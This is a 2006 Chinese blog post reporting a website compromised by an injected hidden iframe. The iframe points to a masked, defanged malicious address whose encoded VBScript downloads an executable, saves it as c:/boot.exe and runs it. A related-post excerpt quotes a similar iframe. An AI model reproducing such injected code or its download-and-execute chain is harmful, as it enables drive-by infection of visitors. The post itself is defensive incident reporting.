一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

最新推荐文章于 2024-07-19 11:27:44 发布
最新推荐文章于 2024-07-19 11:27:44 发布
阅读量111 收藏
点赞数
文章标签: shell

endurer 原创

2006-12-06 第1

该网站首页末被<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加入</a></nobr>代码:

/--------
<iframe src=hxxp://www.z*z***yqr.com/z*l/wm.htm width=0 height=0 frameborder=0></iframe>
--------/

wm.htm 的内容为escape()<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加密</a></nobr>的VBscrīpt<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>脚本</a></nobr>代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 z*l.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

z*l.exe Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm,<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>瑞星</a></nobr>报为Trojan.DL.Multi.wen

iteye_6637
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
unixtux的专栏
07-24 1002
这个木马是卡巴斯基发现的,每次开机卡巴斯基就会出现提示有木马,但是点击处理所有删除它电脑就会重启,重启完后卡巴斯基有会有相同的提示,依然重启,我实在是解决不了,通过网上才知道是这个木马,卡巴是杀不掉的,只能发现,想想发现也行,毕竟卡巴是杀毒软件,不是木马专杀,总有解决的办法,网上的说法各部相同,经我反复思考还是把它解决了。 网上说 Trojan-Downloader.Win32...
遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
gdfyug的博客
02-18 693
遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
IE自动弹出窗口(JS/TrojanDownloader.Iframe.NDR 木马查杀)故障解决
weixin_33877092的博客
06-21 179
故障原因: 从网上下载一个FAR HTML软件,运行注册机染毒(声明:运行之前已经对注册机扫描,Nod32和木马克星未报毒); 症状: 打开IE后,每间隔一段时间,随机打开一个网页: http://www.dabao1.cn/adv.htm http://008.wangwang1.cn/bbs/fx.htm 等各类随机网页,打开的网站本身也是挂马的网站,Nod32会报警并自动关闭进程。   木...
病毒HEUR:Trojan-Downloader.Win32.Generic
Gin工作室
08-06 4026
这个病毒一般是浏览网页留下的,病毒多在四个地方: C:/Documents and Settings/Administrator/Cookies C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files   C:/Documents and Settings/Default User/Co
某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
caobihole
12-15 170
endurer 原创2006-12-15 第1版 论坛首被加入代码:/--------<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>--------/ wm.htm 的内容为JavaScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 s...
遭遇trojan-downloader.win32.agent.vjh
NONAME的专栏
07-29 1415
 今天下午开始本打算学习ARCIMS的,正是因为要学习它就装软件吧,为了节约内存我把卡巴给关掉,于是惹来了trojan-downloader.win32.agent.vjh木马,真够郁闷的。现象:一旦机器启动如果卡巴随机启动,于是卡巴会提示发现病毒并要求处理,你点击处理不一会机器就自动重启了。然而卡巴还是会报告这是什么病毒。解决:自己先是去删除windows文件下东西。根本不管用。最后上网
遭遇木马Trojan-PWS.Win32.Agent.BU(续篇)
weixin_33736649的博客
11-12 750
一直以为那个木马Trojan-PWS.Win32.Agent.BU是同事的U盘上带过来的,直到后来在安装/卸载一个软件时无意中发现不是的(呵呵~真不好意思,错怪她了),事情还是从公司领导决定用禁U软件说起,通过第三方软件把在公司上下除了必要的几台电脑外一律禁用U盘,一方面是考虑到U盘是传播木马的最大根源,另一方面也防止信息从计算机USB端口泄漏出去,...
有关Trojan-Downloader.Win32.QQHelper.**文件删除
煙鋼@csdn
11-26 896
    常见名称:Trojan-Downloader.Win32.QQHelper.mo,Trojan-Downloader.Win32.QQHelper.jz, Trojan-Downloader.Win32.QQHelper.ep ... 从名字可以看出这是一个典型的木马程序,卡巴斯基和木马清除工具EWIDO都能够监测到这种病毒,不过可惜被感染的文件收到系统保护,没办法清除,连安全模式
木马下载Trojan-Downloader.Win32.Small.nkb
04-13 2427
捕获时间2008-04-12病毒症状该程序是使用VC编写的下载程序,由微点主动防御软件自动捕获,采用UPX加壳方式试图躲避特征码扫描,加壳后长度为8,704字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过网页木马、文件捆绑的方式传播。病毒分析该木马程序被执行后,拷贝自身到%SystemRoot%/system32目录下,修改文件创建时间以及修改时间;通过API函数Crea
trojan-1.16.0-win.zip
04-01
trojan
Trojan-Downloader.Win32.Generic.a...
06-08
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载木马类,病毒运行后调用API获取系统文件夹...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
Trojan-Qt5-Windows.1.1.6.rar
01-27
【标题】"Trojan-Qt5-Windows.1.1.6.rar" 是一个与恶意软件相关的压缩包文件,特别提到了"Trojan Client",这通常指的是特洛伊木马病毒的一个客户端版本。特洛伊木马是一种设计用于欺骗用户的计算机程序,表面上看...
Trojan-Qt5-Windows.zip
03-14
这是一个只有bug修复的版本: [Bug修复] 修复Safari PAC不工作 [Bug修复] 修复断开连接后privoxy不会释放端口 [Bug修复] 修改PAC立即生效 [Bug修复] 修复不开启http模式还检查http端口是否占用的bug
第二节 shell脚本基础(5)(6)(7)
weixin_73298423的博客
07-15 407
shell的执行方式,调试和退出值
Linux热键,shell含义及权限介绍
2301_79194984的博客
07-16 807
为了方便能够快速的输入指令,通常利用[Tab]来帮助我们。[Tab]键的作用是具有命令补全和档案补齐的功能。通常为了输入一个指令,我能快要输完的时候按下[Tab],能够快速补齐,能够减少一点时间吧,起始也能够利用[Tab]来帮助我们查看符合那几个开头的指令能有哪些。生活中的例子可以帮助我们理解。VIP才能看最新出来的电影。进学校的宿舍需要刷脸这也是权限。权限就是通过一定的条件拦住一部分,给另一部分人权利,来访问某种资源。来决定有无或者是能不能的问题。
shell处理用户输入——传递参数
2401_82591819的博客
07-17 385
shell脚本传递数据的最基本方法是使用命令行参数。命令行参数允许运行脚本时在命令行中添加数据:本例向脚本addem传递了两个命令行参数(10和30)。脚本会通过特殊的变量来处理命令行参数。接下来将介绍如何在bash shell脚本中使用命令行参数。
WSL2- 使用Shell工具连接的一些配置
最新发布
qq_47910339的博客
07-19 323
WSL2-使用Shell工具连接的一些配置

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值